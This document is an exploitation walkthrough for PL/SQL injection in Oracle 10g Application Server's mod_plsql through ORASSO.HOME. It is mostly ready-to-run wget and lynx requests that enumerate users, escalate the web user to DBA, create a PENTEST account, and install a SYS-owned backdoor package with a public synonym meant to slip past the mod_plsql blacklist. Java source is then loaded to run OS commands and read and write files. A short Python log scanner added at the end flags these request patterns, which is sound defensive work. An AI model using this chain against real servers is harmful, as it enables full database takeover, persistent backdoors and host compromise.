Oracle 10g Application Server up to 10.1.2.1.0: remote exploitation of the issue described in:
This example injects through ORASSO.HOME, but these paths also work:
- JAVA_AUTONOMOUS_TRANSACTION.PUSH
- XMLGEN.USELOWERCASETAGNAMES
- PORTAL.WWV_HTP.CENTERCLOSE
- ORASSO.HOME
- WWC_VERSION.GET_HTTP_DATABASE_INFO
Information gathering
View current user (should be ORASSO_PUBLIC)
lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=SELECT+USERNAME+FROM+USER_USERS"
View roles of current user
lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=SELECT+*+FROM+USER_ROLE_PRIVS"
View full users list
lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=select+username+from+all_users"
View the IP address of the database server
lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=select+SYS_CONTEXT('USERENV',+'IP_ADDRESS',+15)+ipaddr+from+dual"
View the hostname of the database server
lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=select+SYS_CONTEXT('USERENV',+'HOST',+15)+ipaddr+from+dual"
Exploiting
The ORASSO_PUBLIC user has very few privileges and cannot create procedures, functions or packages, so only a few exploits can be used to elevate its privileges.
Another way is to use cursors to exploit common vulnerabilities without creating packages or functions.
Exploit #1 grants DBA to the current user (Oracle 10g R1 and R2 prior to CPU October 2006). An error is returned, but it works anyway, and it does not need to create packages.
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=DECLARE+SEQUENCE_OWNER+VARCHAR2(200);+SEQUENCE_NAME+VARCHAR2(200);+v_user_id+number;+v_commands+VARCHAR2(32767);+NEW_VALUE+NUMBER;+BEGIN+SELECT+user_id+INTO+v_user_id+FROM+user_users;+v_commands+:=+'insert+into+sys.sysauth$+'+||+'+values'+||+'('+||+v_user_id+||+',4,'+||+'999,null)';+SEQUENCE_OWNER+:=+'TEST';+SEQUENCE_NAME+:=+''',lockhandle=>:1);'+||+v_commands+||+';commit;+end;--';+NEW_VALUE+:=+1;+SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE(SEQUENCE_OWNER+=>+SEQUENCE_OWNER,+SEQUENCE_NAME+=>+SEQUENCE_NAME,+NEW_VALUE+=>+NEW_VALUE);+END;"
Exploit #2 (ab)uses SYS.KUPW$WORKER.MAIN to execute commands as DBA:
http://www.milw0rm.com/exploits/3584
http://192.168.41.5:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=DECLARE+MYC NUMBER;+BEGIN+MYC+:=+DBMS_SQL.OPEN_CURSOR;DBMS_SQL.PARSE(MYC,'declare+pragma+autonomous_transaction;begin+execute+immediate+''create+user+pippo+identified+by+pippo123'';commit;end;',0);SYS.KUPW\$WORKER.MAIN('''+AND+0=dbms_sql.execute('||myc||')--','.');end;
Create user PENTEST identified by PEN123TEST.
Obviously this only works once DBA has been granted to ORASSO_PUBLIC.
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=CREATE+USER+PENTEST+IDENTIFIED+BY+PEN123TEST"
Give some specific, Java-related grants to user PENTEST.
These privileges are needed if you want to use Java to execute O.S. commands and read/write the underlying file system with raptor_oraexec.sql:
http://0xdeadbeef.info/exploits/raptor_oraexec.sql
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+DBA+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVADEBUGPRIV+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVAIDPRIV+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVASYSPRIV+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVAUSERPRIV+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVA_ADMIN+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+SYSTEM+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+SESSION+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+USER+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+JOB+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+USER+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+SYNONYM+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+GRANT+ANY+ROLE+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+ANY+TABLE+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+MANAGE+SCHEDULER+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+SELECT+ANY+TABLE+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ANY+CLASS+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+ANY+LIBRARY+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+ANY+SYNONYM+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+ANY+PROCEDURE+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ANY+LIBRARY+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ANY+PROGRAM+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+GRANT+ANY+PRIVILEGE+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+PUBLIC+SYNONYM+TO+PENTEST"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ANY+PROCEDURE+TO+PENTEST"
Create a backdoor package that keeps working even if the vulnerability is patched.
The package is owned by SYS, so each issued command is executed as SYSDBA.
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=CREATE+OR+REPLACE+PACKAGE+PENTEST.BACK_PKG+AS+PROCEDURE+exec_this_code(commandline+IN+VARCHAR2);END+BACK_PKG;"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=CREATE+OR+REPLACE+PACKAGE+BODY+PENTEST.BACK_PKG+AS+PROCEDURE+exec_this_code(commandline+IN+VARCHAR2)+IS+BEGIN+EXECUTE+IMMEDIATE+commandline;+END;+END+BACK_PKG;"
Grant public execute to the backdoor package.
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ON+PENTEST.BACK_PKG+TO+PUBLIC"
Creating a public synonym can be useful to run the backdoor while bypassing the mod_plsql blacklist (be sure not to use a forbidden word such as sys, owa or system in the synonym name).
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=CREATE%20OR%20REPLACE%20PUBLIC%20SYNONYM%20BACKDOOR%20FOR%20PENTEST.BACK_PKG"
Use this syntax to execute commands as SYSDBA through the backdoor (yes, it works via HTTP too 🙂).
wget -q -O /dev/null http://192.168.100.195:7777/pls/orasso/BACKDOOR.exec_this_code?COMMANDLINE=create%20user%20pippo%20identified%20by%20pippo123
This is a Java procedure to access the file system and execute OS commands (raptor_oraexec.sql). You can run it on a single command line or just cut & paste it as it is.
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=create or replace and resolve java source named PENTEST.oraexec as import java.lang.*; import java.io.*; public class oraexec { /* * Command execution module */ public static void execCommand (String command) throws IOException { Runtime.getRuntime().exec(command); } /* * File reading module */ public static void readFile(String filename) throws IOException { FileReader f = new FileReader(filename); BufferedReader fr = new BufferedReader(f); String text = fr.readLine(); while (text != null) { System.out.println(text); text = fr.readLine(); } fr.close(); } /* * File writing module */ public static void writeFile(String filename, String line) throws IOException { FileWriter f = new FileWriter(filename, true); /* append */ BufferedWriter fw = new BufferedWriter(f); fw.write(line); fw.write(\"\n\"); fw.close(); } }"
Let's create 3 different procedures that use the Java source above to execute commands, read files and write files.
Execute commands
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=create or replace procedure pentest.javacmd(p_command varchar2) as language java name 'oraexec.execCommand(java.lang.String)';"
Read files
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=create or replace procedure pentest.javareadfile(p_filename in varchar2) as language java name 'oraexec.readFile(java.lang.String)';"
Write (append to) files
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=create or replace procedure pentest.javawritefile(p_filename in varchar2, p_line in varchar2) as language java name 'oraexec.writeFile(java.lang.String, java.lang.String)';"
Use the dbms_java.grant_permission stored procedure to give read, write and execute permission on the file system (/) to the user PENTEST.
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=exec dbms_java.grant_permission('PENTEST','SYS:java.io.FilePermission','/','read' )"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=exec dbms_java.grant_permission('PENTEST','SYS:java.io.FilePermission','/','write' )"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=exec dbms_java.grant_permission('PENTEST','SYS:java.io.FilePermission','/','execute' )"
Grant public execute on the new stored procedures that wrap oraexec.*
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=grant execute on pentest.javacmd to public"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=grant execute on pentest.javareadfile to public"
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=grant execute on pentest.javawritefile to public"
Here we go, let's run an OS command (remember to use full paths).
wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);pentest.javacmd(:1);--=/usr/sbin/ping 192.168.100.1"
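Every request in this walkthrough has the same shape: a mod_plsql parameter name that starts with ")" to close the generated procedure call, followed by an injected PL/SQL call. As an added defender-side example that is not part of the original write-up, this Python scanner flags that shape in OHS/Apache access-log lines; the log lines are constructed, and the marker list is taken only from the calls shown on this page.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined format); the first three mirror the
# request shape used on this page, the last two are benign traffic.
SAMPLE_LOG = """\
10.0.0.7 - - [12/Mar/2007:10:01:02 +0100] "GET /pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=SELECT+USERNAME+FROM+USER_USERS HTTP/1.0" 500 312 "-" "Lynx/2.8.5"
10.0.0.7 - - [12/Mar/2007:10:01:09 +0100] "GET /pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+DBA+TO+PENTEST HTTP/1.0" 500 298 "-" "Wget/1.10"
10.0.0.7 - - [12/Mar/2007:10:02:11 +0100] "GET /pls/orasso/orasso.home?);execute+immediate+:1;--=exec%20dbms_java.grant_permission('PENTEST','SYS:java.io.FilePermission','/','execute'%20) HTTP/1.0" 500 298 "-" "Wget/1.10"
10.0.0.9 - - [12/Mar/2007:10:03:00 +0100] "GET /pls/orasso/orasso.home HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2007:10:03:05 +0100] "GET /pls/orasso/orasso.home?p_lang=us HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Calls (ab)used in the requests above; any of them arriving inside a mod_plsql
# query string is a strong indicator of PL/SQL injection.
SUSPICIOUS_CALLS = (
    "owa_util.cellsprint", "execute immediate", "dbms_cdc_impdp.bump_sequence",
    "kupw$worker.main", "dbms_sql.parse", "dbms_java.grant_permission",
    "create or replace and resolve java source",
)

def classify_request(url):
    """Return the reasons a /pls/ request looks like PL/SQL injection (empty list if clean)."""
    if not url.lower().startswith("/pls/"):
        return []
    _, sep, query = url.partition("?")
    if not sep:
        return []
    reasons = []
    for pair in query.split("&"):
        name, _, raw_value = pair.partition("=")
        name, value = unquote_plus(name), unquote_plus(raw_value)
        # A legitimate mod_plsql parameter name is a plain identifier; one that
        # starts with ')' or carries ';' or '--' breaks out of the procedure call.
        if name.startswith(")") or ";" in name or "--" in name:
            reasons.append("parameter name breaks out of procedure call: %r" % name)
        blob = (name + " " + value).lower()
        reasons.extend("suspicious call in query: " + m for m in SUSPICIOUS_CALLS if m in blob)
    return reasons

def scan_log(text):
    """Return (ip, url, reasons) for every flagged line of an access log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            reasons = classify_request(m.group("url"))
            if reasons:
                hits.append((m.group("ip"), m.group("url"), reasons))
    return hits

if __name__ == "__main__":
    for ip, url, reasons in scan_log(SAMPLE_LOG):
        print(ip, url, "|", "; ".join(reasons))
```

The query string is only visible in the access log for GET requests like the ones used here; injected POST bodies need request-body logging or inspection at a reverse proxy in front of mod_plsql.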